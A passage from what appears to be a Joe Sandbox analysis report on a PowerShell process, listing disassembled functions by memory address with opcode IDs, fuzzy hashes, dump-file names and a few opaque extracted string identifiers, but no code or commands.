                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fc535ff82c9dd781078c390e38c741b89fbb857fdafe234b4b040953cb94e202
                                                                                                                            • Instruction ID: 7952d10f71be8871819bfa557c4e28a9043932755932457f06931eaddaf2c7ab
                                                                                                                            • Opcode Fuzzy Hash: fc535ff82c9dd781078c390e38c741b89fbb857fdafe234b4b040953cb94e202
                                                                                                                            • Instruction Fuzzy Hash: 93F0A7317006159FC7109699DC84E7FB7E9EB88765B00092DE10AC3340DF34AD4587A0
                                                                                                                            Function 00BFD998 Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711796549.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_bfd000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ad46b8feaa4c72d899140379a731a43dd66edb3c28e9595322dff8f62fb8c0b
                                                                                                                            • Instruction ID: 53c3a8f067b6baaf9cc56e7e9dabec272f2d7bc991bc4a8532e965bdc8853328
                                                                                                                            • Opcode Fuzzy Hash: 0ad46b8feaa4c72d899140379a731a43dd66edb3c28e9595322dff8f62fb8c0b
                                                                                                                            • Instruction Fuzzy Hash: 00F0F975104640AFD725CF06C985D23BBBAEB85720B19C599A84A9B312C671FC46CFA0
                                                                                                                            Function 00C690E8 Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 433557fea5e18322269cd3af83f9ab30b5109b4f5b2ef0eeb124e470409733fc
                                                                                                                            • Instruction ID: d781d413600e046357284fef1eb3725ca72b53f979daed52a5e6b833aa9cf2b8
                                                                                                                            • Opcode Fuzzy Hash: 433557fea5e18322269cd3af83f9ab30b5109b4f5b2ef0eeb124e470409733fc
                                                                                                                            • Instruction Fuzzy Hash: 97F027B17041085BD714AB64D0153ABB7D6DBC0728F10816ADA0947385CE392D46C7D1
                                                                                                                            Function 00C67697 Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3b61798e512fbc736e4c1689c0e0b30904817e3fac90a6341e8e217c2ab54810
                                                                                                                            • Instruction ID: b8b78aa2ced82148512f02906cf5a68c629938ac3d204f4d5720805640664ccb
                                                                                                                            • Opcode Fuzzy Hash: 3b61798e512fbc736e4c1689c0e0b30904817e3fac90a6341e8e217c2ab54810
                                                                                                                            • Instruction Fuzzy Hash: 9FF0E5797005088FCB10CB7CD940AAA7BE2FBCC7557054695F919DB324DA34DD018B90
                                                                                                                            Function 00C6DE47 Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ae3e396997b136af4d12e73c42b49eaef71d3c734904e2dc3abdab19a95bcd7
                                                                                                                            • Instruction ID: debc6035d348678a05e142b2711e6d7a3b1373ebe5521ce5f75755edeebe0a7c
                                                                                                                            • Opcode Fuzzy Hash: 5ae3e396997b136af4d12e73c42b49eaef71d3c734904e2dc3abdab19a95bcd7
                                                                                                                            • Instruction Fuzzy Hash: CAE06D357401008F82109B1DD484C66B7FAEFDE71531500AAF545CB730CA21EC01CB90
                                                                                                                            Function 00C6DE48 Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 97f69008a2a928fd164a98834b96eedce8546fcfc0e25a44447744eb8e0440d5
                                                                                                                            • Instruction ID: 0df2d1fe6e4223ac23d517c039ad863d7649e38c569ae1d0152ecea134b9a59a
                                                                                                                            • Opcode Fuzzy Hash: 97f69008a2a928fd164a98834b96eedce8546fcfc0e25a44447744eb8e0440d5
                                                                                                                            • Instruction Fuzzy Hash: 1DE0E5757401118F86109B1ED498C26B7FAEFDE76572900AAE54ACB735DA62EC01CB90
                                                                                                                            Function 00C69168 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3cc139824d438f131fdb240c85819a0ffbcb9f6f8c16a7e66a9945a7372d09f0
                                                                                                                            • Instruction ID: 4e64e02755b39e86693c22774d953f268a8049b0271bf81481a0d39fd996b232
                                                                                                                            • Opcode Fuzzy Hash: 3cc139824d438f131fdb240c85819a0ffbcb9f6f8c16a7e66a9945a7372d09f0
                                                                                                                            • Instruction Fuzzy Hash: 00F06D709003144BD3609F78D89D39ABBE9FB45310F004869E65EC3340DB3969818B90
                                                                                                                            Function 00C6F458 Relevance: .0, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6873dbbdd230736af19a8e5de6cc4dfb83bb1842a074f74441fc7469109dac5
                                                                                                                            • Instruction ID: 250277f6f78260931eb187e645a3286d5ca7700eae96aa5637141cec9bba95b9
                                                                                                                            • Opcode Fuzzy Hash: c6873dbbdd230736af19a8e5de6cc4dfb83bb1842a074f74441fc7469109dac5
                                                                                                                            • Instruction Fuzzy Hash: 25E0ED70D052499FC744DFB8D8925AAFFF4EF0A200B5481EEC84ADB655EA315511CBA2
                                                                                                                            Function 00C6954F Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e67a49e2dff2034ef1d5540c0f3d959e98fc072aa0c4bc26586abf24324894d
                                                                                                                            • Instruction ID: 2c744c4cf699a80b3a514e1ddd4c3f8a39086217d3f6bb18e462d7a2b150f307
                                                                                                                            • Opcode Fuzzy Hash: 5e67a49e2dff2034ef1d5540c0f3d959e98fc072aa0c4bc26586abf24324894d
                                                                                                                            • Instruction Fuzzy Hash: F6D05EA270212627457470BA28916BBA7CFCAC4AA470A0236EA0AC7643EC60CC0553F1
                                                                                                                            Function 00C68800 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: da98b007e1626c342d586d543786591960769cefd06a5c996e6fbb855512dbab
                                                                                                                            • Instruction ID: b00f195d1402cb4c8b466607840ee4686fc10815707980783a158ae2814d78f0
                                                                                                                            • Opcode Fuzzy Hash: da98b007e1626c342d586d543786591960769cefd06a5c996e6fbb855512dbab
                                                                                                                            • Instruction Fuzzy Hash: 90E04F3590820A8BCB18DB75E8865EABFB4AB45314F104666ED5593740DA305995CBC1
                                                                                                                            Function 00C68978 Relevance: .0, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6efb2e9286c96de21d39f6eaae8d744c13b49ca960530b8eb5173b0da3a8744
                                                                                                                            • Instruction ID: 5ec78583cdebf0c88ecf71992829f4c3363c451aafa846399673fff315b9cfac
                                                                                                                            • Opcode Fuzzy Hash: b6efb2e9286c96de21d39f6eaae8d744c13b49ca960530b8eb5173b0da3a8744
                                                                                                                            • Instruction Fuzzy Hash: 7FE04F3570462457CB093779A81D3AEBB9AABC4B65F04042AF60A83341CF695D0683D9
                                                                                                                            Function 00C69550 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aac369d2bfd12f7cf782caffb10469ca8b6e192b29cea7775dbee66aeca5111b
                                                                                                                            • Instruction ID: a8596f0d297c009749eb8db17450d1f89d4707360fbdaef3a4cb45012130f60d
                                                                                                                            • Opcode Fuzzy Hash: aac369d2bfd12f7cf782caffb10469ca8b6e192b29cea7775dbee66aeca5111b
                                                                                                                            • Instruction Fuzzy Hash: 9FD05EA270212627457470BA18916BB92CFCAC4AA470A0236AA0AC7243EC60CC0553E1
                                                                                                                            Function 00C6DCE8 Relevance: .0, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                            • Instruction ID: 074230ad425472f739a6de6a6d6e07dbadf1c1ffa28934f5277ae361984e5aba
                                                                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                            • Instruction Fuzzy Hash: 9BE08631B10014978B18995AD4504EDF7AADBCC320F14807AD90AA7340DA32591586E1
                                                                                                                            Function 00C6AF97 Relevance: .0, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 24ea079c6cba630666b97b7353db1222f86327f0422638b30bf259ed46bb43e3
                                                                                                                            • Instruction ID: 13f40aaf973b9b159a622a232f98327c1726cb5c18f2456056dda5d5a2b9ecda
                                                                                                                            • Opcode Fuzzy Hash: 24ea079c6cba630666b97b7353db1222f86327f0422638b30bf259ed46bb43e3
                                                                                                                            • Instruction Fuzzy Hash: 10D01236704165230B2CA06F78215BBA6DF87C5661319C03AF508D7704DC52CC0206E7
                                                                                                                            Function 00C6DC88 Relevance: .0, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 18b410a2a315abe0d33159c3c231c9fbc7a0dc3d98fd57c3321b1479e854e4c1
                                                                                                                            • Instruction ID: 71d06de57fd367fd9b62c8647d5012e26ad1ffaff0acc5f2b80869d52f598122
                                                                                                                            • Opcode Fuzzy Hash: 18b410a2a315abe0d33159c3c231c9fbc7a0dc3d98fd57c3321b1479e854e4c1
                                                                                                                            • Instruction Fuzzy Hash: 50C01217B1E2A85BC71F56427C408F57B28DD872B1B010093DB17CAC0141110B3452F2
                                                                                                                            Function 00C6F468 Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                            • Instruction ID: 9c42c933d9e6f3d8987a156e2c2f480879f37e2ff03738fde2d764784468deb9
                                                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                            • Instruction Fuzzy Hash: D0D067B0D0420D9F8780EFADD94156EFBF4EB48200F6085BE8919E7301E7329A128FD1
                                                                                                                            Function 00C68747 Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 461d3929ed77d491cdd082836c4cd1217bf1f1501317dd2cec7df6dc729bc00d
                                                                                                                            • Instruction ID: ffca433aa230c7fcf5c9293d6845ad74b5f55c65bac0df65bf72007b4326b2c5
                                                                                                                            • Opcode Fuzzy Hash: 461d3929ed77d491cdd082836c4cd1217bf1f1501317dd2cec7df6dc729bc00d
                                                                                                                            • Instruction Fuzzy Hash: 2FD017308041198BCB0CABA4E85B5FDBB34FA10311F400269FA0792690EE341A4ACAC2
                                                                                                                            Function 00C67933 Relevance: .0, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ac048a8a1713b5aebdee5a3b4d418918077e4e5e7a25f2ec9d8eddaedc49011
                                                                                                                            • Instruction ID: 08db8e6b00c12a3d61ba75548afeb481af64389c80d4ff49bc98ca7bada28106
                                                                                                                            • Opcode Fuzzy Hash: 2ac048a8a1713b5aebdee5a3b4d418918077e4e5e7a25f2ec9d8eddaedc49011
                                                                                                                            • Instruction Fuzzy Hash: 61D0223100D3C88FC7031BB1AC244923F34EF4321870508EBE44E8B1A3C969AE08CB91
                                                                                                                            Function 00C68748 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be58b79da21b11ec0bfed18471710a95388c6a4d6f4f808b69ace3d3a1d9dcee
                                                                                                                            • Instruction ID: 5126b345076e07e31c363831033728fe0041c05bff171d1258c62ebcefb04400
                                                                                                                            • Opcode Fuzzy Hash: be58b79da21b11ec0bfed18471710a95388c6a4d6f4f808b69ace3d3a1d9dcee
                                                                                                                            • Instruction Fuzzy Hash: DED067318041198BCB0CABA5E85B5BDBB74FA14311F504269EA1792290EE351A5ACAC6
                                                                                                                            Function 00C68810 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 38d8eea62ae8963a24f1c537be3f17c87214228872884f68cc7c8509c77e58bb
                                                                                                                            • Instruction ID: cd47c1b733242ef6d5550efc05c06666ea3a9b0f7348db3a9d7789d0fb5606c9
                                                                                                                            • Opcode Fuzzy Hash: 38d8eea62ae8963a24f1c537be3f17c87214228872884f68cc7c8509c77e58bb
                                                                                                                            • Instruction Fuzzy Hash: 2BD01734A0820A8BCB18EFA4E84696EBBB4AB44300F004269E94993350EA305C05CBC1
                                                                                                                            Function 00C67EA0 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0719b05dfe73169d27c2a3b9f0ade51d539cf4ae594afeb1b0489a048f5480db
                                                                                                                            • Instruction ID: e0c3ac0ac84a55636c503537e49e039c256ecbade81e4660c7bd0a16b3d1932c
                                                                                                                            • Opcode Fuzzy Hash: 0719b05dfe73169d27c2a3b9f0ade51d539cf4ae594afeb1b0489a048f5480db
                                                                                                                            • Instruction Fuzzy Hash: 85C08C1711E3A14FEF1B42301C2809AAF3106830123064293D089C3496C855CE008251
                                                                                                                            Function 00C67940 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 40bd3cb20bc7d273c0b28a83b2b5d79a97ff812997b1c31d996711f12e962443
                                                                                                                            • Instruction ID: a240e1867637544c06ae6c8200f41e6a779801ec369a85546e5fa45edb171c45
                                                                                                                            • Opcode Fuzzy Hash: 40bd3cb20bc7d273c0b28a83b2b5d79a97ff812997b1c31d996711f12e962443
                                                                                                                            • Instruction Fuzzy Hash: 58B09231044B0DCFC2496F75E8488157329BB40219B8008A8E90E0A2928E3AE889CE45
                                                                                                                            Function 00C6BD4F Relevance: .0, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2afcaa0ab5079ed79a7cfeae5862dbd3587884bac4d7923ec1851f0fc6036d21
                                                                                                                            • Instruction ID: 783cc0bf0e63ec48ab6c2eb93e6c20c12ed5c429f9c52fa48fb3971a0aa47978
                                                                                                                            • Opcode Fuzzy Hash: 2afcaa0ab5079ed79a7cfeae5862dbd3587884bac4d7923ec1851f0fc6036d21
                                                                                                                            • Instruction Fuzzy Hash: 36A011282022200AAA080E338A082AA2AAAAA802C2F0880A2F000C0080CA2CC0082200

                                                                                                                            Non-executed Functions

                                                                                                                            Function 070A1BE0 Relevance: 20.4, Strings: 16, Instructions: 409COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $c*k$4'^q$4'^q$4'^q$4'^q$845l$845l$tP^q$tP^q$J8l$J8l$J8l$J8l$J8l$r7l$r7l
                                                                                                                            • API String ID: 0-779142625
                                                                                                                            • Opcode ID: c479ee9f67682549a1e7f8295c8dadea632ff1fc5293a0e6e61b0f9a56c478a1
                                                                                                                            • Instruction ID: cdf202a44cefca5a982c3ac61b0f9871741073acbda9ff0978254f1856e5822a
                                                                                                                            • Opcode Fuzzy Hash: c479ee9f67682549a1e7f8295c8dadea632ff1fc5293a0e6e61b0f9a56c478a1
                                                                                                                            • Instruction Fuzzy Hash: 63D18DB1B0434AAFC7658BA894006AAFBF6AFC6310F14C6BBC555CF256DB31C845C7A1
                                                                                                                            Function 070A3928 Relevance: 12.8, Strings: 10, Instructions: 327COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$-l$-l
                                                                                                                            • API String ID: 0-2649444500
                                                                                                                            • Opcode ID: 7a79af6b76bd875d3ea55b427d56b4632016b51a7238c99898bc51897c92d0f7
                                                                                                                            • Instruction ID: 48bb61d345873ca256e055613b1dcd5f07e349dce685cb23eca3f400d0fa3ced
                                                                                                                            • Opcode Fuzzy Hash: 7a79af6b76bd875d3ea55b427d56b4632016b51a7238c99898bc51897c92d0f7
                                                                                                                            • Instruction Fuzzy Hash: 3DA18AB1704356AFC7648BA99800B6AFBE6AFC6310F1486ABE545CF392CB31DC45C761
                                                                                                                            Function 070A0FA1 Relevance: 12.7, Strings: 10, Instructions: 192COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: fcq$845l$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-688136699
                                                                                                                            • Opcode ID: 58236e58f1e65e7032fb39783ab3811133154093ed2cc62c8ddf9b7234409214
                                                                                                                            • Instruction ID: f32fd03977b91e6d746d90d3711635867ee4c82d78a1c3f3e600dab5f7704f4b
                                                                                                                            • Opcode Fuzzy Hash: 58236e58f1e65e7032fb39783ab3811133154093ed2cc62c8ddf9b7234409214
                                                                                                                            • Instruction Fuzzy Hash: 2171CFB0A1420EFFDB64CF84C544BAAB7F2BF45351F148266E8209B290C775DD94CBA1
                                                                                                                            Function 070A3678 Relevance: 8.9, Strings: 7, Instructions: 191COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1723364077.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_70a0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$-l$-l
                                                                                                                            • API String ID: 0-1144043643
                                                                                                                            • Opcode ID: 9e283beaf33f4f1439556a1483800f66c67b167279006914cdca646c36a33698
                                                                                                                            • Instruction ID: f2dfe005b018b3e4cd94c6fc70206dfd5c901381a55a6cb64c7c27f3ac73c0d8
                                                                                                                            • Opcode Fuzzy Hash: 9e283beaf33f4f1439556a1483800f66c67b167279006914cdca646c36a33698
                                                                                                                            • Instruction Fuzzy Hash: 8F5188F5704346AFCB749AA9880066EFFE6AFC3610F24866BD455CB351DB31C885CBA1
                                                                                                                            Function 00C6EBF8 Relevance: 8.9, Strings: 7, Instructions: 151COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_c60000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,bq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-13851718
                                                                                                                            • Opcode ID: 6d8c6a9c892fe3b870bbf1cec8c3ec8714ea1955fe9b69f318321fe644c02ca9
                                                                                                                            • Instruction ID: de3f30580e44a9ae929c096433c087c90db20480d34ef6c6740f3a7ce4adb7e0
                                                                                                                            • Opcode Fuzzy Hash: 6d8c6a9c892fe3b870bbf1cec8c3ec8714ea1955fe9b69f318321fe644c02ca9
                                                                                                                            • Instruction Fuzzy Hash: CB4146683840198FCB396B7985D457D3AE27F8D75032018AFD022CF3B5EE19CD828796
                                                                                                                            Function 00C67A21 Relevance: 6.5, Strings: 5, Instructions: 245COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.1711978033.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
